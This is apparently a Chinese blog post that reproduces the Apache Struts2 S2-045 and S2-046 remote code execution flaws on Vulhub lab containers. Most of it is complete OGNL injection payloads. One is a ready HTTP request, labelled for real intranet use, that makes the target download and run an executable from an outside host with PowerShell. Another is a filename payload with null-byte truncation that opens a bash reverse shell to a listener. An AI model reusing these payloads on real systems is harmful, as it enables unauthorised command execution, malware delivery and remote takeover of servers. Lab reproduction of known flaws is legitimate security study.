携手创作,共同成长!这是我参与「掘金日新计划 · 8 月更文挑战」的第9天,点击查看活动详情
Vulhub复现Struts2
13、S2-045远程执行代码漏洞
1)漏洞简介
(1)漏洞原理:
在使用基于Jakarta插件的文件上传功能时,有可能存在远程命令执行,导致系统被黑客入侵。恶意用户可在上传文件时通过修改HTTP请求头中的Content-Type值来触发该漏洞,进而执行系统命令!
(2)影响版本:
Struts2.3.5 – 2.3.31
Struts2.5 – 2.5.10
2)漏洞启动
(1)开启struts2-045漏洞
sudo docker-compose up -d
(2)验证是否开启
sudo docker ps
3)漏洞复现
(1)访问靶机:
http://192.168.253.7:8080/
(2)验证漏洞是否存在-POC-1:
%{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(#ros.println(100*5000)).(#ros.flush())}
成功远程代码执行!
(3)POC-2:
%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('vulhub',11*11)}.multipart/form-data
成功远程代码执行!
内网实战POC:
POST /S2-045/fileupload/doUpload.action HTTP/1.1
Host: 20.20.20.104:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: %{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='powershell -Command (new-object System.Net.WebClient).DownloadFile('http://20.20.20.199/ch4nge52.exe','ch4nge52.exe');start-process ch4nge52.exe').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())} boundary=---------------------------255663886332559909593529682920
Content-Length: 344
Origin: http://20.20.20.104:8080
Connection: close
Referer: http://20.20.20.104:8080/S2-045/fileupload/upload.action
Cookie: JSESSIONID=7B84132FC4F461D411AEBE4DA902C2AA
Upgrade-Insecure-Requests: 1
-----------------------------255663886332559909593529682920
Content-Disposition: form-data; name="upload"; filename=""
Content-Type: application/octet-stream
-----------------------------255663886332559909593529682920
Content-Disposition: form-data; name="caption"
aaa
-----------------------------255663886332559909593529682920--
这个方法可以直接创建一句话!
14、S2-046远程执行代码漏洞
1)漏洞简介
(1)漏洞原理:
攻击者可以通过设置Content-Disposition的filename字段或者设置Content-Length超过2G这两种方式来触发异常并导致filename字段中的OGNL表达式得到执行从而达到远程攻击的目的。该漏洞与之前S2-045漏洞成因及原理一样(CVE漏洞编号是同一个),只是漏洞利用的字段发生了改变!
与S2-045相同,S2-046也是OGNL注入,但出现在上传请求的文件名字段中,并且需要NUL字节来拆分有效负载和其余字符串。
(2)影响版本:
Struts 2.3.5-Struts 2.3.31,Struts 2.5-Struts 2.5.10
2)漏洞启动
(1)开启struts2-046漏洞
sudo docker-compose up -d
(2)验证是否开启
sudo docker ps
3)漏洞复现
(1)访问靶机:
http://192.168.253.7:8080/
(2)验证漏洞是否存在
抓包后在filename=""填入:
%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Test',1+99)}\x00b
找到b之前的字符,进行00截断:
可以看到POC中算式执行成功!
(3)执行"ls"代码:
"%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='ls').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())} b"
这里b是62,那么62之前的字符改为00阶段即可!
(4)在filename处插入下列EXP可反弹shell。同样需要进行00截断:
"%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='bash -i >& /dev/tcp/192.168.253.65/8888 0>&1').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())} b"
反弹shell上线!成功远程代码执行!
